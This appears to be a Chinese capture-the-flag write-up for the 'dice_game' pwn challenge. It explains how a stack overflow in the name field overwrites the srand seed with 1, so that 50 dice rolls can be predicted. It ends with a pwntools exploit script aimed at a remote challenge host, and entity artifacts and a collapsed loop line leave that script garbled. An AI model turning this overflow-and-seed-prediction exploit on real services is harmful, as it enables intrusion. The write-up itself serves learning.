攻防世界dice_game栈溢出+随机数

攻防世界 dice_game栈溢出&＃43;随机数

检查保护

发现是64位程序&＃xff0c;并且开启了NX保护和地址随机化

上ida

发现flag敏感字符&＃xff0c;追踪发现sub_B28函数里面可以直接得到flag
这里解释一下

Fopen函数&＃xff1a;

FILE *fopen(char *filename, char *mode);


filename为文件名&＃xff08;包括文件路径&＃xff09;&＃xff0c;mode为打开方式&＃xff0c;它们都是字符串。
Fget函数&＃xff1a;
函数原型

char *fgets(char *str, int n, FILE *stream);


参数&＃xff1a;
• str-- 这是指向一个字符数组的指针&＃xff0c;该数组存储了要读取的字符串。
• n-- 这是要读取的最大字符数&＃xff08;包括最后的空字符&＃xff09;。通常是使用以 str 传递的数组长度。
• stream-- 这是指向 FILE 对象的指针&＃xff0c;该 FILE 对象标识了要从中读取字符的流。

srand() 函数&＃xff1a;
用来设置 rand() 产生随机数时的随机数种子。参数 seed 必须是个整数&＃xff0c;如果每次 seed 都设相同值&＃xff0c;rand() 所产生的随机数值每次就会一样。

我们分析程序&＃xff0c;发现我们要猜对50次数字才能得到flag&＃xff0c;我们这里将rand的种子设置为1&＃xff0c;然后利用libc中的rand函数&＃xff0c;直接输出随机数的值&＃xff0c;然后在把值输入程序中&＃xff0c;这样我们就能够得到正确的随机数了

利用方式&＃xff1a;
程序中出现

Exp如下&＃xff1a;

#!usr/bin/python
#coding&＃61;utf-8
from pwn import *
from ctypes import *
context(arch&＃61;"amd64",os&＃61;"linux")
p&＃61;remote("220.249.52.133",38591)
#e&＃61;ELF("./guess")
#libc&＃61;e.libc
libc &＃61; cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
offset&＃61;0x40
payload&＃61;offset*&＃39;a&＃39;&＃43;p64(1)
p.sendlineafter("name:",payload)
libc.srand(1)
for i in range(50):num&＃61;str(libc.rand()%6&＃43;1)p.sendlineafter("point(1~6):",num)
p.interactive()